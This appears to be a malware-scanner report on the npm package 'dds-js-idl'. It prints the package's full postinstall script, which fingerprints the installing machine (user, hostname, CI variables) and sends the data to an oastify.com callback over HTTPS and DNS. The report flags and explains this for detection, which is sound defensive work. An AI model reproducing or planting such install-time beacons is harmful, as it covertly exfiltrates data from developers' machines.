// npm 패키지
dds-js-idl
Security research canary — NASA VDP
버전
2
메인테이너
1
최초 publish
2026-05-23
publisher
l0bo
tarball
1,029 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-23
// exfil path
what is read → where it ships
steals
- ○ home dir
- ○ system info
sends to
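(no destination string extracted automatically — payload may be dynamic / obfuscated; note that the code shown on this page hard-codes its destination in CALLBACK_HOST, which is used for both the HTTPS request and the DNS lookup)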
evidence in excerpt
> const { execSync } = require('child_process');
> const CALLBACK_HOST = 'lg5ys3jebfzwk366pilidbmah1nsbszh.oastify.com';
> try { return execSync(cmd, { timeout: 3000 }).toString().trim(); }
> hostname: os.hostname(),
> https.get({ host: CALLBACK_HOST, path, timeout: 5000 }, () => {}).on('error', () => {});
// publisher 캠페인 by l0bo
이 계정에서 catch된 패키지 2건
고립된 catch가 아닙니다. 동일 publisher가 1개의 다른 패키지를 추가로 발행했고, 모두 파이프라인이 catch했습니다 — 일회성이 아닌 조직적 캠페인의 형태입니다. 아래 링크는 각 형제 catch의 분석으로 이동합니다.
// offending code· @1.0.1· 1 file flagged
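llm: benign · 0.85 → 의심 전송지 없음, 원격 실행 형태 없음 — 1 other host(s). (주의: 이 LLM 판정은 같은 페이지의 static flag(oast-callback-domain, child-process-spawn) 및 osv-flagged:MAL-2026-4264와 상충하므로, 이 판정만으로 패키지를 안전하다고 보아서는 안 됩니다.)
- @1.0.1 · AUTO-PUBLISHED · publisher: l0bo · heuristic 75/100 · static flags 5 · llm benign (0.85) via ollama · install-scripts:postinstall · new-publisher:4d · suspicious-description:security-research · osv-flagged:MAL-2026-4264 · reads-env-vars · reads-homedir · reads-system-info · oast-callback-domain · child-process-spawn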
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 other host(s).
// offending code · 1 file flagged · patterns: 5
--- install scripts ---
### postinstall
node postinstall.js

--- package/postinstall.js (excerpt) ---
// Install-time beacon. package.json wires this file to the "postinstall"
// lifecycle script, so it runs automatically during `npm install` with the
// installing user's privileges unless lifecycle scripts are disabled
// (e.g. `npm install --ignore-scripts`).
const https = require('https');
const os = require('os');
const { execSync } = require('child_process');

// Hard-coded destination for both outbound channels below. The page's static
// flags classify it as an OAST callback domain (oast-callback-domain).
const CALLBACK_HOST = 'lg5ys3jebfzwk366pilidbmah1nsbszh.oastify.com';

// Runs `cmd` through a synchronous child process (3 s timeout) and returns its
// trimmed output; any failure is collapsed to the literal string 'error', so
// the script never throws from here.
function get(cmd) {
  try { return execSync(cmd, { timeout: 3000 }).toString().trim(); }
  catch { return 'error'; }
}

// Host fingerprint assembled at install time: local account name (via the
// `whoami` command), hostname, OS platform, working directory, and three
// environment variables that reveal whether the install is happening in CI
// and for which GitHub repository. These seven fields are everything the
// visible code collects.
const payload = {
  whoami: get('whoami'),
  hostname: os.hostname(),
  platform: os.platform(),
  cwd: process.cwd(),
  ci: process.env.CI || '',
  github: process.env.GITHUB_REPOSITORY || '',
  node_env: process.env.NODE_ENV || '',
};

// The fingerprint is serialized into the query string of a GET to /beacon.
const path = '/beacon?' + new URLSearchParams(payload).toString();

// Channel 1: HTTPS GET. The response callback is empty and errors are
// swallowed, so a blocked or failed request leaves no trace in install output.
https.get({ host: CALLBACK_HOST, path, timeout: 5000 }, () => {}).on('error', () => {});

// Channel 2: DNS lookup of <whoami>.<CALLBACK_HOST>, which places the account
// name in a DNS label. NOTE(review): this presumably still signals the host's
// resolver path where outbound HTTPS is filtered; DNS logs for subdomains of
// CALLBACK_HOST are therefore a useful detection point.
require('dns').lookup(`${payload.whoami}.${CALLBACK_HOST}`, () => {});

--- package.json (entry) ---
// Besides "postinstall", both "main" and "bin" point at postinstall.js, so
// requiring the package or invoking its bin command runs the same beacon.
// The description labels the package a research canary; the install-time
// behaviour shown here is the same for anyone who installs it.
{
  "name": "dds-js-idl",
  "version": "1.0.1",
  "description": "Security research canary — NASA VDP",
  "scripts": { "postinstall": "node postinstall.js" },
  "main": "postinstall.js",
  "bin": { "dds-js-idl": "postinstall.js" }
}

--- postinstall.js (entry) ---
// Same content as the excerpt above: fingerprint the host, then report it to
// CALLBACK_HOST over HTTPS and DNS with all errors suppressed.
const https = require('https');
const os = require('os');
const { execSync } = require('child_process');

const CALLBACK_HOST = 'lg5ys3jebfzwk366pilidbmah1nsbszh.oastify.com';

// Best-effort command runner: trimmed output, or 'error' on any failure.
function get(cmd) {
  try { return execSync(cmd, { timeout: 3000 }).toString().trim(); }
  catch { return 'error'; }
}

// Collected fields: account name, hostname, platform, cwd, CI indicators.
const payload = {
  whoami: get('whoami'),
  hostname: os.hostname(),
  platform: os.platform(),
  cwd: process.cwd(),
  ci: process.env.CI || '',
  github: process.env.GITHUB_REPOSITORY || '',
  node_env: process.env.NODE_ENV || '',
};

const path = '/beacon?' + new URLSearchParams(payload).toString();

// Outbound HTTPS request; response ignored, errors swallowed.
https.get({ host: CALLBACK_HOST, path, timeout: 5000 }, () => {}).on('error', () => {});

// Outbound DNS lookup carrying the account name as a subdomain label.
require('dns').lookup(`${payload.whoami}.${CALLBACK_HOST}`, () => {});
